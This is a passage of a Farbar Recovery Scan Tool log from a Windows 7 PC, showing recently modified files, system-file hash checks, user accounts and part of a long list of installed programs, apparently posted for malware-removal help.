2018-03-19 16:53 - 2013-11-14 20:32 - 000000000 ____D C:\Users\Martin\AppData\Local\NVIDIA Corporation
2018-03-19 16:51 - 2014-10-08 23:05 - 000000000 ____D C:\Users\Martin\AppData\LocalLow\Temp
2018-03-19 16:51 - 2009-07-14 06:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2018-03-19 16:50 - 2014-08-16 13:47 - 000000000 ____D C:\Windows\Minidump
2018-03-02 11:13 - 2015-05-08 17:01 - 000253880 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamswissarmy.sys
2018-03-02 11:12 - 2013-10-17 22:18 - 000000000 ____D C:\Program Files (x86)\Steam
2018-03-02 11:12 - 2013-10-17 21:57 - 000000000 ____D C:\ProgramData\NVIDIA
2018-03-02 11:12 - 2013-10-17 09:50 - 000000000 ____D C:\Users\Martin\AppData\Local\LogMeIn Hamachi
2018-03-02 10:26 - 2009-07-14 06:13 - 000782470 _____ C:\Windows\system32\PerfStringBackup.INI
2018-03-02 10:26 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\inf
2018-03-02 10:21 - 2013-10-21 11:33 - 000000000 ____D C:\Users\Martin\AppData\Roaming\EVEMon
2018-03-02 08:24 - 2014-10-31 23:52 - 000000000 ____D C:\Program Files (x86)\Spybot - Search & Destroy 2
2018-03-02 08:24 - 2013-10-17 22:12 - 000000000 ____D C:\ProgramData\Spybot - Search & Destroy
2018-03-02 07:57 - 2013-10-17 21:55 - 000000000 ____D C:\ProgramData\Malwarebytes
2018-03-01 17:28 - 2015-12-29 21:35 - 000000000 ____D C:\Users\Martin\AppData\Local\CrashDumps
2018-03-01 17:27 - 2014-11-01 00:45 - 000000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2018-03-01 17:24 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\Resources
2018-03-01 17:14 - 2013-10-17 21:56 - 000000000 ____D C:\Program Files (x86)\NVIDIA Corporation
2018-03-01 17:10 - 2014-05-11 08:30 - 000002233 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2018-03-01 17:08 - 2009-07-14 04:20 - 000000000 ___HD C:\Windows\system32\GroupPolicy
2018-03-01 17:06 - 2015-08-01 20:51 - 000000000 ____D C:\Users\Martin\AppData\Roaming\qBittorrent
2018-03-01 17:06 - 2013-10-18 00:10 - 000000000 ____D C:\Users\Martin\AppData\Roaming\DAEMON Tools Lite
2018-03-01 17:05 - 2013-12-11 18:03 - 000000000 ____D C:\Users\Martin\AppData\Local\Battle.net
2018-03-01 16:51 - 2013-10-17 22:16 - 000000000 ____D C:\Users\Martin\AppData\Roaming\Skype
2018-03-01 08:21 - 2013-11-02 11:57 - 000000000 ____D C:\Users\Martin\AppData\Local\NVIDIA
2018-02-26 15:19 - 2017-12-10 03:02 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation
2018-02-26 15:19 - 2013-12-05 18:49 - 000000000 ____D C:\temp
2018-02-26 15:19 - 2013-10-17 21:56 - 000000000 ____D C:\ProgramData\NVIDIA Corporation
2018-02-26 15:19 - 2013-10-17 21:56 - 000000000 ____D C:\Program Files\NVIDIA Corporation
2018-02-26 14:45 - 2018-01-01 14:12 - 000004146 _____ C:\Windows\System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:12 - 000003814 _____ C:\Windows\System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:12 - 000003798 _____ C:\Windows\System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:09 - 000003738 _____ C:\Windows\System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:09 - 000003738 _____ C:\Windows\System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:09 - 000003730 _____ C:\Windows\System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:09 - 000003554 _____ C:\Windows\System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:45 - 2018-01-01 14:09 - 000003494 _____ C:\Windows\System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2018-02-26 14:43 - 2016-01-03 15:27 - 000002441 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2018-02-26 14:42 - 2016-01-03 15:27 - 000004476 _____ C:\Windows\System32\Tasks\Adobe Acrobat Update Task
2018-02-25 06:36 - 2016-06-25 22:00 - 000505232 _____ (NVIDIA Corporation) C:\Windows\system32\nvumdshimx.dll
2018-02-25 06:36 - 2015-12-27 20:47 - 019925592 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvwgf2um.dll
2018-02-25 06:36 - 2013-10-17 21:56 - 022845992 _____ (NVIDIA Corporation) C:\Windows\system32\nvwgf2umx.dll
2018-02-25 06:34 - 2013-10-17 21:56 - 015558416 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvd3dum.dll
2018-02-25 06:34 - 2013-10-17 21:56 - 004424400 _____ (NVIDIA Corporation) C:\Windows\system32\nvapi64.dll
2018-02-24 13:46 - 2013-10-17 21:56 - 000045511 _____ C:\Windows\system32\nvinfo.pb
2018-02-23 21:01 - 2017-12-10 03:01 - 000001951 _____ C:\Windows\NvContainerRecovery.bat
2018-02-23 20:22 - 2015-12-27 20:48 - 000633984 _____ (NVIDIA Corporation) C:\Windows\system32\nv3dappshext.dll
2018-02-23 20:22 - 2015-12-27 20:48 - 000081752 _____ (NVIDIA Corporation) C:\Windows\system32\nv3dappshextr.dll
2018-02-23 20:22 - 2013-10-17 21:57 - 005953096 _____ (NVIDIA Corporation) C:\Windows\system32\nvcpl.dll
2018-02-23 20:22 - 2013-10-17 21:57 - 002587992 _____ (NVIDIA Corporation) C:\Windows\system32\nvsvc64.dll
2018-02-23 20:22 - 2013-10-17 21:57 - 001768008 _____ (NVIDIA Corporation) C:\Windows\system32\nvsvcr.dll
2018-02-23 20:22 - 2013-10-17 21:57 - 000451144 _____ (NVIDIA Corporation) C:\Windows\system32\nvmctray.dll
2018-02-23 20:22 - 2013-10-17 21:57 - 000122896 _____ (NVIDIA Corporation) C:\Windows\system32\nvshext.dll
2018-02-20 16:47 - 2014-05-11 08:32 - 000000000 ____D C:\Users\Martin\AppData\LocalLow\Heroes and Generals
2018-02-17 14:54 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\rescache
2018-02-17 13:46 - 2009-07-14 04:20 - 000000000 ____D C:\Windows\AppCompat

==================== Files in the root of some directories =======

2015-02-07 14:37 - 2015-02-07 14:37 - 000000099 _____ () C:\Users\Martin\AppData\Roaming\LauncherSettings_live.cfg
2014-09-24 22:04 - 2015-04-20 15:06 - 000002544 _____ () C:\Users\Martin\AppData\Roaming\SpeedRunnersLog.txt
2014-06-05 16:13 - 2017-03-29 08:32 - 000000039 _____ () C:\Users\Martin\AppData\Roaming\trafikcfg.ini
2014-07-26 08:25 - 2014-07-26 08:25 - 000007602 _____ () C:\Users\Martin\AppData\Local\Resmon.ResmonCfg
2017-01-30 10:49 - 2017-12-12 09:40 - 000045056 _____ () C:\Users\Martin\AppData\Local\WebpageIcons.db
2018-03-02 08:11 - 2018-03-02 08:11 - 000000000 _____ () C:\Users\Martin\AppData\Local\{9D703F0F-0DEB-403A-ABF0-858F9D72DBB8}

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe
[2018-01-05 13:05] - [2018-01-01 02:50] - 000455680 _____ (Microsoft Corporation) 11D6A262B617130F7C16E308C12E0D41

C:\Windows\system32\wininit.exe => MD5 is legit
C:\Windows\SysWOW64\wininit.exe => MD5 is legit
C:\Windows\explorer.exe => MD5 is legit
C:\Windows\SysWOW64\explorer.exe => MD5 is legit
C:\Windows\system32\svchost.exe => MD5 is legit
C:\Windows\SysWOW64\svchost.exe => MD5 is legit
C:\Windows\system32\services.exe => MD5 is legit
C:\Windows\system32\User32.dll => MD5 is legit
C:\Windows\SysWOW64\User32.dll => MD5 is legit
C:\Windows\system32\userinit.exe => MD5 is legit
C:\Windows\SysWOW64\userinit.exe => MD5 is legit
C:\Windows\system32\rpcss.dll
[2018-01-05 13:05] - [2018-01-01 03:18] - 000512000 _____ (Microsoft Corporation) BA6C9EE518A11DA4AD061B223EBED3D3

C:\Windows\system32\dnsapi.dll => MD5 is legit
C:\Windows\SysWOW64\dnsapi.dll => MD5 is legit
C:\Windows\system32\Drivers\volsnap.sys => MD5 is legit

LastRegBack: 2018-02-27 17:55

==================== End of FRST.txt ============================

 

 

 

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 14.03.2018
Ran by Martin (19-03-2018 16:59:35)
Running from D:\User profile\Desktop
Windows 7 Ultimate Service Pack 1 (X64) (2013-10-17 20:32:57)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-1755371218-3412237994-1746218496-500 - Administrator - Disabled)
Guest (S-1-5-21-1755371218-3412237994-1746218496-501 - Limited - Disabled)
Martin (S-1-5-21-1755371218-3412237994-1746218496-1000 - Administrator - Enabled) => C:\Users\Martin

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)


==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Actual Multiple Monitors 8.1.1 (HKLM-x32\...\Actual Multiple Monitors_is1) (Version: 8.1.1 - Actual Tools)
Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 18.011.20038 - Adobe Systems Incorporated)
Adobe Flash Player 28 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 28.0.0.161 - Adobe Systems Incorporated)
Alien Isolation (HKLM-x32\...\Alien Isolation_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, spider91)
ArcGIS 10.2.2 for Desktop (HKLM-x32\...\{761CB033-D425-4A16-954D-EA8DEF4D053B}) (Version: 10.2.3552 - Environmental Systems Research Institute, Inc.) Hidden
ArcGIS 10.2.2 for Desktop (HKLM-x32\...\ArcGIS 10.2.2 for Desktop) (Version: 10.2.3552 - Environmental Systems Research Institute, Inc.)
Artemis Artemis (HKLM-x32\...\Artemis) (Version: 2.00.0 - Thom Robertson)
Audacity 2.0.4 (HKLM-x32\...\Audacity_is1) (Version: 2.0.4 - Audacity Team)
Audiobook Cutter Free Edition (HKLM-x32\...\{7B460E9F-8AEC-4A46-81D5-25A3D15365F1}) (Version: 1.9.3 - Audiobook Software)
Avidemux 2.6 - 64 bits (HKLM-x32\...\Avidemux 2.6 - 64 bits (64-bit)) (Version: 2.6.10.150607 - )
Battle.net (HKLM-x32\...\Battle.net) (Version:  - Blizzard Entertainment)
BFME2 All-In-One Patch Installer & Switcher version 1.0 (HKLM-x32\...\{B258BEC7-DFB5-4DDC-BA90-BF02B91CA0C6}_is1) (Version: 1.0 - dijkstra & forshire)
Breach (HKLM\...\UDK-640527a6-bd3d-4ff1-8130-b9100ba72023) (Version:  - Epic Games, Inc.)
CCleaner (HKLM\...\CCleaner) (Version: 5.23 - Piriform)
CloneCD (HKLM-x32\...\CloneCD) (Version:  - SlySoft)
Commandos 2 and 3 (HKLM-x32\...\GOGPACKCOMMANDOS23_is1) (Version: 2.0.0.15 - GOG.com)
Commandos Ammo Pack (HKLM-x32\...\GOGPACKCOMMANDOS1_is1) (Version: 2.0.0.19 - GOG.com)
Company of Heroes (HKLM-x32\...\{BA801B94-C28D-46EE-B806-E1E021A3D519}) (Version: 1.0.0.78 - THQ Inc.)
Core Temp 1.0 RC6 (HKLM\...\{086D343F-8E78-4AFC-81AC-D6D414AFD8AC}_is1) (Version: 1.0 - Alcpu)
Cossacks 3 (HKLM-x32\...\1797227701_is1) (Version: 1.8.8.81.5707 - GOG.com)
Cossacks 3: Guardians of the Highlands (HKLM-x32\...\1483750963_is1) (Version: 1.8.8.81.5707 - GOG.com)
Cossacks Anthology (HKLM-x32\...\Cossacks Anthology_is1) (Version:  - GOG.com)
Cuphead (HKLM-x32\...\1963513391_is1) (Version: hotfix_1.1.4 - GOG.com)
DAEMON Tools Lite (HKLM-x32\...\DAEMON Tools Lite) (Version: 4.47.1.0337 - Disc Soft Ltd)
Dark Reign + Expansion (HKLM-x32\...\GOGPACKDARKREIGN_is1) (Version: 2.0.0.41 - GOG.com)
Defraggler (HKLM\...\Defraggler) (Version: 2.19 - Piriform)
Diaspora version 1.1.1 (HKLM-x32\...\{1F5ABAAA-6D61-4FC1-A595-86CBA5517E7A}_is1) (Version: 1.1.1 - Diaspora Development)
Discord (HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\Discord) (Version: 0.0.300 - Discord Inc.)
DisplayDriverAnalyzer (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_DisplayDriverAnalyzer) (Version: 391.01 - NVIDIA Corporation) Hidden
DisplayFusion 5.1.1 (HKLM-x32\...\B076073A-5527-4f4f-B46B-B10692277DA2_is1) (Version: 5.1.1.0 - Binary Fortress Software)
Distrust (HKLM-x32\...\Distrust_is1) (Version:  - )
Divinity - Original Sin Enhanced Edition (HKLM-x32\...\1445516929_is1) (Version: 2.5.0.12 - GOG.com)
Divinity Original Sin 2 (HKLM-x32\...\Divinity Original Sin 2_is1) (Version:  - )
Dolphin VR 4.0 (HKLM-x32\...\Dolphin) (Version: 4.0 - Dolphin Team)
Doom (HKLM-x32\...\{B6A2B3BA-C93E-4AEE-BBCF-BE91DDC84962}_is1) (Version:  - id Software)
EasyLog USB (HKLM-x32\...\{4F84DDD2-7468-4771-9906-3552521CE796}) (Version: 6.8.0 - Lascar Electronics Ltd.)
Elite Dangerous Launcher version 0.4.5499.0 (HKLM-x32\...\{696F8871-C91D-4CB1-825D-36BE18065575}_is1) (Version: 0.4.5499.0 - Frontier Developments)
Enter the Gungeon (HKLM-x32\...\1456912569_is1) (Version: 2.7.0.9 - GOG.com)
EVEMon (HKLM-x32\...\EVEMon) (Version: 2.2.3 - battleclinic.com)
EVERSPACE (HKLM-x32\...\1513949567_is1) (Version: 2.0.0.2 - GOG.com)
Exact Audio Copy 1.3 (HKLM-x32\...\Exact Audio Copy) (Version: 1.3 - Andre Wiethoff)
f.lux (HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\Flux) (Version:  - f.lux Software LLC)
ForHonor (HKLM-x32\...\Uplay Install 569) (Version:  - Ubisoft)
Game of Thrones Episode 6 (HKLM-x32\...\Game of Thrones Episode 6_is1) (Version:  - )
GameRanger (HKU\S-1-5-21-1755371218-3412237994-1746218496-1000\...\GameRanger) (Version:  - GameRanger Technologies)
Gauntlet Slayer Edition (HKLM-x32\...\Gauntlet Slayer Edition_is1) (Version:  - )
GOG.com Commandos 2 (HKLM\...\{c1a036f7-30df-46e5-b5a3-c5e67039e947}.sdb) (Version:  - )
GOG.com Heroes of Might and Magic 3 (HKLM\...\{1d3c859c-1028-4822-b0a7-da4f7bbc18bc}.sdb) (Version:  - )
GOG.com The Settlers 3 (HKLM\...\{f707a2f1-2ed1-4560-a087-97aa176c3777}.sdb) (Version:  - )
GOG.com Unreal Tournament GOTY (HKLM\...\{fa491d91-322c-4059-a1f7-4a79782edee8}.sdb) (Version:  - )
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 64.0.3282.186 - Google Inc.)
Google Earth Pro (HKLM-x32\...\{FA1BBF34-E994-4310-95D7-BE93092B8E61}) (Version: 7.3.1.4507 - Google)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.7 - Google Inc.) Hidden
Google Update Helper (HKLM-x32\...\{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}) (Version: 1.3.25.11 - Google Inc.) Hidden
Hammerwatch (HKLM-x32\...\GOGPACKHAMMERWATCH_is1) (Version: 2.3.0.6 - GOG.com)
Hand of Fate - Wildcards (HKLM-x32\...\Hand of Fate: Wildcards_is1) (Version: 2.3.0.7 - GOG.com)
Hand of Fate (HKLM-x32\...\1424100574_is1) (Version: 2.4.0.8 - GOG.com)
Hand of Fate 2 (HKLM\...\aGFuZG9mZmF0ZTI_is1) (Version: 1 - )
Handset USB Driver (HKLM\...\{D2D77DC2-8299-11D1-8949-444553540000}_is1) (Version: 5.2066.1.A14B04 - )
HCS Voice Pack version 1.6.2 (HKLM-x32\...\{CEAF7641-D8E3-41C2-9D26-13D1DE9E6EF7}_is1) (Version: 1.6.2 - HCS Voice Packs)
Hearthstone (HKLM-x32\...\Hearthstone) (Version:  - Blizzard Entertainment)
HELLDIVERS (HKLM-x32\...\HELLDIVERS_is1) (Version:  - )
Heroes & Generals (HKLM-x32\...\Heroes & Generals) (Version: 1.0.6.1 - Reto-Moto)
Heroes of Might and Magic 3 Complete (HKLM-x32\...\GOGPACKHOMM3COMPLETE_is1) (Version: 2.0.0.16 - GOG.com)
HiPatch (HKLM-x32\...\{3C87E0FF-BC0A-4F5E-951B-68DC3F8DF000}) (Version: 5.1.4.6 - Hi-Rez Studios)
Hi-Rez Studios Authenticate and Update Service (HKLM-x32\...\{3C87E0FF-BC0A-4F5E-951B-68DC3F8DF1FC}) (Version: 3.0.0.0 - Hi-Rez Studios)
HitmanPro 3.7 (HKLM\...\HitmanPro37) (Version: 3.7.9.232 - SurfRight B.V.)
Homeworld Deserts of Kharak (HKLM-x32\...\Homeworld Deserts of Kharak_is1) (Version:  - )
Homeworld Remastered Collection (HKLM-x32\...\SG9tZXdvcmxkUmVtYXN0ZXJlZENvbGxlY3Rpb24=_is1) (Version: 1 - )
How to Survive (HKLM-x32\...\How to Survive_is1) (Version:  - )
How to Survive El Diablo Islands (HKLM-x32\...\How to Survive El Diablo Islands_is1) (Version:  - )
HP Dropbox Plugin (HKLM-x32\...\{23617173-F935-4C17-A323-EB1207F3ED49}) (Version: 36.0.31.53050 - Hewlett-Packard Co.)
HP ENVY 4520 series Basic Device Software (HKLM\...\{AA543771-C534-4954-831A-9862C626796F}) (Version: 36.0.72.54013 - Hewlett-Packard Co.)
HP Google Drive Plugin (HKLM-x32\...\{AFF80405-E56A-48E7-98FC-8E46E261949F}) (Version: 36.0.31.53050 - Hewlett-Packard Co.)
Hunted - The Demon's Forge (HKLM-x32\...\Hunted - The Demon's Forge_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, spider91)
iDealshare VideoGo 6.1.1.6250 (HKLM-x32\...\{CC4C06C4-7C78-4AAB-B5AF-33FB11CCD850}_is1) (Version:  - iDealshare Corporation)
Intel® USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 2.5.0.19 - Intel Corporation)
Java™ 6 Update 45 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86416045FF}) (Version: 6.0.450 - Oracle)
K-Lite Mega Codec Pack 12.9.0 (HKLM-x32\...\KLiteCodecPack_is1) (Version: 12.9.0 - KLCP)
Kutools for Excel 11.0.0.228 (HKLM-x32\...\{A095BA43-4A97-4D55-8E25-A0BC46F10765}_is1) (Version: 11.0.0.0 - Detong)
L.A.Noire (HKLM-x32\...\L.A.Noire_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, spider91)
LaCie Private Public version 1.2 (HKLM\...\{5553AC21-44FC-4F8B-B3BB-3B7E913F465B}_is1) (Version: 1.2 - LaCie Private, Inc.)
Legend of Grimrock 2 (HKLM-x32\...\Legend of Grimrock 2_is1) (Version:  - )
Lightning (HKLM-x32\...\{277C2E30-99C8-40A5-B5F6-A21422ACDB6A}) (Version:  - )
Little Big Adventure (HKLM-x32\...\GOGPACKLBA_is1) (Version: 2.0.0.20 - GOG.com)
Little Big Adventure 2 (HKLM-x32\...\GOGPACKLBA2_is1) (Version: 2.0.0.6 - GOG.com)
Little Nightmares (HKLM-x32\...\Little Nightmares_is1) (Version:  - )
Little Nightmares Secrets of The Maw Chapter 1 (HKLM-x32\...\Little Nightmares Secrets of The Maw Chapter 1_is1) (Version:  - )
LogMeIn Hamachi (HKLM-x32\...\{99A016E1-0840-43AE-8434-A18CEDFA833B}) (Version: 2.2.0.58 - LogMeIn, Inc.) Hidden
LogMeIn Hamachi (HKLM-x32\...\LogMeIn Hamachi) (Version: 2.2.0.58 - LogMeIn, Inc.)
LOTR The Return of the King tm (HKLM-x32\...\{6E298B0A-558C-4138-0096-740677B382CD}) (Version:  - )
Malwarebytes version 3.3.1.2183 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.3.1.2183 - Malwarebytes)
Master of Magic (HKLM-x32\...\GOGPACKMASTEROFMAGIC_is1) (Version: 2.0.0.20 - GOG.com)
Metal SLUG X 1.0 (HKLM-x32\...\Metal SLUG X 1.0) (Version: 1.0 - Èãðû íà Cat-A-Cat.NET)
Microsoft .NET Framework 4.6.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.6.01055 - Microsoft Corporation)
Microsoft ASP.NET MVC 4 Runtime (HKLM-x32\...\{3FE312D5-B862-40CE-8E4E-A6D8ABF62736}) (Version: 4.0.40804.0 - Microsoft Corporation)
Microsoft Games for Windows - LIVE Redistributable (HKLM-x32\...\{F2508213-9989-4E85-A078-72BE483917EF}) (Version: 3.5.88.0 - Microsoft Corporation)
Microsoft Games for Windows Marketplace (HKLM-x32\...\{4CB0307C-565E-4441-86BE-0DF2E4FB828C}) (Version: 3.5.50.0 - Microsoft Corporation)
Microsoft Office Professional Plus 2013 (HKLM\...\Office15.PROPLUS) (Version: 15.0.4569.1506 - Microsoft Corporation)
Microsoft Office Proofing Tools 2013 Preview - English (HKLM\...\{20150000-001F-0409-1000-0000000FF1CE}) (Version: 15.0.4128.1014 - Microsoft Corporation)
Microsoft Office Proofing Tools 2013 Preview - Swedish (HKLM\...\{20150000-001F-041D-1000-0000000FF1CE}) (Version: 15.0.4128.1014 - Microsoft Corporation)
Microsoft Security Essentials (HKLM\...\Microsoft Security Client) (Version: 4.10.209.0 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50907.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{A49F249F-0C91-497F-86DF-B2585E8E76B7}) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6E8E85E8-CE4B-4FF5-91F7-04999C9FAE6A}) (Version: 8.0.50727.42 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.10.25008 (HKLM-x32\...\{f1e7e313-06df-4c56-96a9-99fdfd149c51}) (Version: 14.10.25008.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.10.25008 (HKLM-x32\...\{c239cea1-d49e-4e16-8e87-8c055765f7ec}) (Version: 14.10.25008.0 - Microsoft Corporation)
Microsoft Visual J# 2.0 Redistributable Package (HKLM-x32\...\Microsoft Visual J# 2.0 Redistributable Package) (Version:  - Microsoft Corporation)
Microsoft Xbox 360 Accessories 1.2 (HKLM\...\{D9C50188-12D5-4D3E-8F00-682346C2AA5F}) (Version: 1.20.146.0 - Microsoft)
Microsoft Xbox One Controller for Windows (HKLM\...\{DC2CB48C-FD96-48EB-A36A-7D995BB587EB}) (Version: 1.0.2 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 3.1 (HKLM-x32\...\{19BFDA5D-1FE2-4F25-97F9-1A79DD04EE20}) (Version: 3.1.10527.0 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 (HKLM-x32\...\{2BFC7AA0-544C-4E3A-8796-67F3BE655BE9}) (Version: 4.0.20823.0 - Microsoft Corporation)
Microsoft XNA Framework Redistributable 4.0 Refresh (HKLM-x32\...\{D69C8EDE-BBC5-436B-8E0E-C5A6D311CF4F}) (Version: 4.0.30901.0 - Microsoft Corporation)
Mozilla Firefox 57.0.4 (x64 en-US) (HKLM\...\Mozilla Firefox 57.0.4 (x64 en-US)) (Version: 57.0.4 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 57.0.4.6577 - Mozilla)
MSI Afterburner 4.0.0 (HKLM-x32\...\Afterburner) (Version: 4.0.0 - MSI Co., LTD)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
Mumble 1.2.10 (HKLM-x32\...\{BA360AD9-B847-48EF-A182-6345703284E9}) (Version: 1.2.10 - Thorvald Natvig)
Nidhogg (HKLM-x32\...\TmlkaG9nZw==_is1) (Version: 1 - )
Notepad++ (HKLM-x32\...\Notepad++) (Version: 6.6.9 - Notepad++ Team)
NVIDIA 3D Vision Driver 391.01 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 391.01 - NVIDIA Corporation)
NVIDIA GeForce Experience 3.12.0.84 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.12.0.84 - NVIDIA Corporation)
NVIDIA Graphics Driver 391.01 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 391.01 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.17.0524 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.17.0524 - NVIDIA Corporation)
Open Broadcaster Software (HKLM-x32\...\Open Broadcaster Software) (Version:  - )
OpenAL (HKLM-x32\...\OpenAL) (Version:  - )
Orbital Gear v1.3.3 (HKLM-x32\...\Orbital Gear_is1) (Version: 1.3.3 - OUTLAWS)
Origin (HKLM-x32\...\Origin) (Version: 9.11.5.17432 - Electronic Arts, Inc.)
Outils de vérification linguistique 2013 de Microsoft Office - Français (HKLM\...\{90150000-001F-040C-1000-0000000FF1CE}) (Version: 15.0.4569.1506 - Microsoft Corporation) Hidden
paint.net (HKLM\...\{F10AAD91-58DF-44EC-A647-810197141667}) (Version: 4.0.19 - dotPDN LLC)
Patch v4.17b Update (HKLM-x32\...\{THEGUILDREN-0010-2010-300520102330}_is1) (Version:  - RUNEFORGE Games Studios)
Picasa 3 (HKLM-x32\...\Picasa 3) (Version: 3.9 - Google, Inc.)
PunkBuster Services (HKLM-x32\...\PunkBusterSvc) (Version: 0.986 - Even Balance, Inc.)
